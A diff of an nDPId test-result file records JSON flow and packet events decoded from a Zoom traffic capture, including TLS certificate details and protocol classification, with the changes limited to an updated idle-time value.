-01029{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1642965458402,"flow_last_seen":1642965458578,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1642965458578,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomsjccv154mmr.sjc.zoom.us","ja3":"832952db10f1453442636675bed2702b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01085{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1642965458402,"flow_last_seen":1642965458752,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1642965458752,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomsjccv154mmr.sjc.zoom.us","ja3":"832952db10f1453442636675bed2702b","ja3s":"8aca82d60194883e764ab2743e60c380","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01362{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1642965458402,"flow_last_seen":1642965458752,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4613,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":1642965458752,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomsjccv154mmr.sjc.zoom.us","server_names":"*.sjc.zoom.us","ja3":"832952db10f1453442636675bed2702b","ja3s":"8aca82d60194883e764ab2743e60c380","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=California, L=San Jose, O=Zoom Video Communications, Inc., CN=*.sjc.zoom.us","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"43:42:0A:34:FD:F6:7A:FC:E9:C1:95:D8:E0:79:7E:17:B9:65:B0:A7"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642965458402,"flow_last_seen":1642965458402,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1642965458402,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1642965458402,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1642965458402,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGngDAqAGykMNJmsOcAbton\/9jAAAAALAC\/\/+GrAAAAgQFtAEDAwUBAQgKBNjhZQAAAAAEAgAA"} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1642965458577,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1642965458577,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGrQSQw0mawKgBsgG7w5wp5A9SaJ\/\/ZKASqbBcNQAAAgQFrAQCCApc+vuKBNjhZQEDAww="} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1642965458577,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1642965458577,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGngzAqAGykMNJmsOcAbton\/9kKeQPU4AQECwj1wAAAQEICgTY4hFc+vuK"} +01029{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1642965458402,"flow_last_seen":1642965458578,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1642965458578,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomsjccv154mmr.sjc.zoom.us","ja3":"832952db10f1453442636675bed2702b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01085{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1642965458402,"flow_last_seen":1642965458752,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1642965458752,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomsjccv154mmr.sjc.zoom.us","ja3":"832952db10f1453442636675bed2702b","ja3s":"8aca82d60194883e764ab2743e60c380","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01362{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1642965458402,"flow_last_seen":1642965458752,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4613,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":1642965458752,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomsjccv154mmr.sjc.zoom.us","server_names":"*.sjc.zoom.us","ja3":"832952db10f1453442636675bed2702b","ja3s":"8aca82d60194883e764ab2743e60c380","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=California, L=San Jose, O=Zoom Video Communications, Inc., CN=*.sjc.zoom.us","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"43:42:0A:34:FD:F6:7A:FC:E9:C1:95:D8:E0:79:7E:17:B9:65:B0:A7"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642965459595,"flow_last_seen":1642965459595,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1642965459595,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":60653,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00598{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1642965459595,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"thread_ts_msec":1642965459595,"pkt":"EBMx8Tl2KDc3AG3ICABFAACXeHsAAEARZSPAqAGykMNJmuztImEAgzNnAQADyErEUocYzaK4R3obiZ8zgwAAAAAAAAACAG9hPwBvYT8AAABA5tdm9ZTyTIyTAkYLAufeKJLgneU8bl8DozakMMlr\/JDYAlm5+8RxsTcW0dGDYHnKojsP3MD2C2S9PgF8PPhtdgAAAAAAQABAAAB1MAABAAMAAiAA"} 00598{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1642965459696,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"thread_ts_msec":1642965459696,"pkt":"EBMx8Tl2KDc3AG3ICABFAACXZlQAAEARd0rAqAGykMNJmuztImEAg30SAQADyErEUocYzaK4R3obiZ8zgwAAAAAAAAACAG9hpABvYaQAAABASNx7XNkhaVV2TkWPa7HXWfzTaegL7lyuofS42ADMsef1ZS+nG51oqDil0vt0Fn4zbdXfyiCV8oAbYGEn4LlcKwAAAAAAQABAAAB1MAABAAMAAiAA"} 
@@ -31,7 +31,7 @@ 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11812,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1642965500053,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1642965500053,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA48ZAAAEAB7HzAqAGykMNJmgMD6XYAAAAARQAESyuFQAAxEX1lkMNJmsCoAbIiYeztBDcAAA=="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11815,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1642965500054,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1642965500054,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA4fvIAAEABXxvAqAGykMNJmgMD6XYAAAAARQAESyuHQAAxEX1jkMNJmsCoAbIiYeztBDcAAA=="} 00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":87,"flow_first_seen":1642965460359,"flow_last_seen":1642965500043,"flow_idle_time":180000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":6087,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":57953,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} 
-00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":902,"flow_first_seen":1642965458402,"flow_last_seen":1642965502810,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":107730,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} +00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":902,"flow_first_seen":1642965458402,"flow_last_seen":1642965502810,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":107730,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} 
00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2230,"flow_first_seen":1642965460219,"flow_last_seen":1642965500203,"flow_idle_time":180000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":334,"flow_tot_l4_payload_len":368542,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":58117,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} 00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":8731,"flow_first_seen":1642965459595,"flow_last_seen":1642965500185,"flow_idle_time":180000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":1297,"flow_tot_l4_payload_len":7999131,"flow_avg_l4_payload_len":916,"midstream":0,"thread_ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":60653,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} 00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1642965500049,"flow_last_seen":1642965500203,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":972,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -- cgit v1.2.3